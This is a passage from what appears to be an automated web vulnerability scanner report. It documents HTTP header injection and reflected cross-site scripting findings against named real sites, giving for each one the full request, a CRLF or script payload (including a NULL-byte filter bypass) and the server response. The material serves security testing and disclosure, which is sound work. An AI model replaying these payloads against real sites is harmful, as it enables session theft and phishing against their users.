If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload eb2c3%0d%0ac4e6f30a34e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/?eb2c3%0d%0ac4e6f30a34e=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=apnlbZaRkP6dPeCnw7cTj0ZaA4FZb2mq3iZc5QWFcgQ1qoaFjZb7yhwYou30slVghs777kSRP6F4n7i4tbkDBKA3flNWD7G4PrKidUMm4uHEhIZbgu7f5RJ6Sa852UJS62FpwTKLUBnfZakQh4lKZc5cvGAin5YrlLuZcrSoenpptWZd5Ws2WcQxH9qhdyub6dneP6MHPteqOCDDfTudRLe8sGVellGGcqPPgCmJZbdQ3cogm2Exrfum7vCU9QcUoVg0iUQ4mSg3bdbyrPVL9SSnqFyl9B85wGr1mSGE8vsQwu873SoOIxNk8Xj16bmj7cg4EZcjdFawnctijtTLoj9brK6A5SyywLwtng11wTxlj8VNZd4a1xCdgFoipLtKE5IjIGrbSBM5hOZdk3hP6nbX2cmrPx259CZcVUrQllJZc1S5MADWQhSgjmADaf4ERECORSWYoZbQZdOekqyZavT6lEatuVUZbxVoGHofFfhvYmYFthR6EEMHBdR57R6xADTxm9SHUXHNetUo5Xs035eWtbPu;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aknAVotlixeRqyTIZbDquGpe27Ln9Imlkp8wch2WkX3AtrQJwh7nR2notOkGxC47D1n1UeZbuEbyVrfbLBChVXDwM676UbUbcTbcOLTPA5BcbZc7y4F75TEVXP8j6ZbZbXTM7GQ4HmvGXUkYfKcQ7pLE2JCMdZcfwLeowgn6nFWZbt6sW3Xn0j2DDvcbp6auBCV7gTcFyAMahpMZdI1vamTskbxXeajVXPDsgoVU0L6KTMNpeuODZbZcqXtkXCKdT17l6TEEwcCVXDjPFaSetUpiHGHnnTXUMsYdwBEHRVd2w5skY4dSfQUlZaiZcqZcOO7Le3pyknX4y9Hi7f3AStgrZbGaucZbEWMcVVDdo0SCjXGTooHUh0Gha4GSmWtWZbdY8Zc4TR80rteXUEE6IpYSgLKFlcNibR2L4SnNT0bRZakoZdGgbZcZbQHGTo1foRG1RrYvAfyXEDh88AZcYqW8Xa2othNsyBuxtAoOhceVCMwBTMTFVPePZcawu2jB65xYEXVq4hl9dvIlwhbbIPjIB42lBOy3eBYIZdV8; path=/; domain=.tribalfusion.com; expires=Sun, 31-Jul-2011 22:21:59 GMT;
Content-Type: text/html
Location: ?eb2c3
c4e6f30a34e
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c8672%0d%0a22b17c10325 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/c8672%0d%0a22b17c10325/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB HTTP/1.1
Host: d.adroll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 02 May 2011 22:24:02 GMT
Connection: close
Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/c8672
22b17c10325
/U6PZANHGRBHQFBIDRUUZ3E/0d742ed1925a733b1b33d771e0b2e1a8.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.3. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /activity/activity.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 76bc1%0d%0ad390fd98756 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /activity/76bc1%0d%0ad390fd98756 HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
Location: http://go.techtarget.com//clicktrack-r/activity/76bc1
d390fd98756

Content-Type: text/html; charset=UTF-8
Content-Length: 104
Connection: close
Date: Mon, 02 May 2011 22:26:01 GMT

The URL has moved <a href="http://go.techtarget.com//clicktrack-r/activity/76bc1
d390fd98756">here</a>

3.4. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfr.247realmedia.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload a286d%0d%0a1880160ebae was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=a286d%0d%0a1880160ebae&dv=1&e=30d HTTP/1.1
Host: mfr.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rjZoABuGb

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:16:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: a286d
1880160ebae
=1; expires=Wed, 01-Jun-11 22:16:42 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain
Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660;path=/;httponly


3.5. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [dv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfr.247realmedia.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload cc980%0d%0a52522401ba6 was submitted in the dv parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=%20NEXTP2MBAN&dv=cc980%0d%0a52522401ba6&e=30d HTTP/1.1
Host: mfr.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rjZoABuGb

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 22:16:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: error converting 'cc980
52522401ba6
' value to numeric value [i]. request to 'mfr.247realmedia.com' for '/RealMedia/ads/adstream.cap/123', referer 'http://www.telecomitalia.it/', handler 'cap-add'
Cteonnt-Length: 620
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8345525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 620

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

4. Cross-site scripting (reflected)
There are 56 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://api.zanox.com/json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zanox.com
Path:   /json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0413<script>alert(1)</script>b1e8f5dc312 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8?callback=zanox.cb.ZX624BF84E5DF10228E1C80f0413<script>alert(1)</script>b1e8f5dc312 HTTP/1.1
Host: api.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:14:05 GMT
Server: Apache-Coyote/1.1
Content-Type: application/javascript;charset=UTF-8
Connection: close
Content-Length: 18973

zanox.cb.ZX624BF84E5DF10228E1C80f0413<script>alert(1)</script>b1e8f5dc312({
"adspace": {"id": "505202"},
"status": "ACTIVE",
"apps": [{
"id": "B5FA7234356994251A1A",
"width": 1,
"height": 1,
"settings": {
"retargeter":
...[SNIP]...

4.2. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a6a5"><script>alert(1)</script>3089dd44574 was submitted in the REST URL parameter 1. This input was echoed as 7a6a5"><script>alert(1)</script>3089dd44574 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%007a6a5"><script>alert(1)</script>3089dd44574 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Tue, 03-May-2011 22:24:20 GMT; path=/; domain=digg.com
Set-Cookie: d=dccfbc2f283397329e5506de618d86128251d32808c7185a04fb2c98c432e3ec; expires=Sun, 02-May-2021 08:32:00 GMT; path=/; domain=.digg.com
X-Digg-Time: D=1570933 10.2.128.119
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16979

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%007a6a5"><script>alert(1)</script>3089dd44574.rss">
...[SNIP]...

4.3. http://expertsystem.net/clienti_dettaglio.asp [cd550 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /clienti_dettaglio.asp

Issue detail

The value of the cd550 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a45"><script>alert(1)</script>4f4293691b6 was submitted in the cd550 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clienti_dettaglio.asp?cd55097a45"><script>alert(1)</script>4f4293691b6 HTTP/1.1
Host: expertsystem.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; __utmc=151171949; __utmb=151171949.1.10.1304392426

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 22:40:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9058
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/clienti_dettaglio.asp?lang=0&amp;cd55097a45"><script>alert(1)</script>4f4293691b6">
...[SNIP]...

4.4. http://expertsystem.net/clienti_dettaglio.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /clienti_dettaglio.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd550"><script>alert(1)</script>50bcce83c95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clienti_dettaglio.asp?cd550"><script>alert(1)</script>50bcce83c95=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 22:20:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9055
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/clienti_dettaglio.asp?lang=0&amp;cd550"><script>alert(1)</script>50bcce83c95=1">
...[SNIP]...

4.5. http://expertsystem.net/clienti_home.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /clienti_home.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cc3"><script>alert(1)</script>261686493f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clienti_home.asp?53cc3"><script>alert(1)</script>261686493f3=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 22:20:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9045
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/clienti_home.asp?lang=0&amp;53cc3"><script>alert(1)</script>261686493f3=1">
...[SNIP]...

4.6. http://expertsystem.net/demo_prodotti.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /demo_prodotti.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26cf"><script>alert(1)</script>2636baa7cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /demo_prodotti.asp?b26cf"><script>alert(1)</script>2636baa7cd0=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:20:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 23399
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/demo_prodotti.asp?lang=0&amp;b26cf"><script>alert(1)</script>2636baa7cd0=1">
...[SNIP]...

4.7. http://expertsystem.net/page.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /page.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a1"><script>alert(1)</script>a91230d7791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page.asp?655a1"><script>alert(1)</script>a91230d7791=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 22:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9029
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/page.asp?lang=0&amp;655a1"><script>alert(1)</script>a91230d7791=1">
...[SNIP]...

4.8. http://expertsystem.net/vetrinanews.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://expertsystem.net
Path:   /vetrinanews.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5da"><script>alert(1)</script>e77b82b7423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vetrinanews.asp?1f5da"><script>alert(1)</script>e77b82b7423=1 HTTP/1.1
Host: expertsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:20:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 14762
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<a href="http://www.expertsystem.it/vetrinanews.asp?lang=0&amp;1f5da"><script>alert(1)</script>e77b82b7423=1">
...[SNIP]...

4.9. http://finanza-mercati.ilsole24ore.com/quotazioni.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /quotazioni.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1267"%3balert(1)//2fb7953fc53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1267";alert(1)//2fb7953fc53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotazioni.php?e1267"%3balert(1)//2fb7953fc53=1 HTTP/1.1
Host: finanza-mercati.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:25:38 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 103141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Content
...[SNIP]...
antirmi che si ricarica la pagina corrente
var inputEl;

inputEl = document.createElement('input');
inputEl.type = "hidden";
inputEl.name = "e1267";alert(1)//2fb7953fc53";
inputEl.value = "1";
formEl.appendChild(inputEl);
inputEl = document.createElement('input');
inputEl.type = "hidden";
inputEl.name = "QUOTE
...[SNIP]...

4.10. http://geoisp.virgilio.it/geo.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://geoisp.virgilio.it
Path:   /geo.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e760<script>alert(1)</script>c08eaae6482 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /geo.php?callback=jsonp13043924108804e760<script>alert(1)</script>c08eaae6482&_=1304392445520 HTTP/1.1
Host: geoisp.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kp=173.193.214.243.1304374430919936; s_vi=[CS]v1|26DF965005079390-40000103C0028B28[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:19:01 GMT
Server: Apache
P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID", policyref="http://geoisp.alice.it/policy/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT CNT"
cache-control: private, must-revalidate, max-age=120
Content-Length: 68
Content-Type: text/html

jsonp13043924108804e760<script>alert(1)</script>c08eaae6482("FGN|");

4.11. http://go.techtarget.com//clicktrack-r/activity/a [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
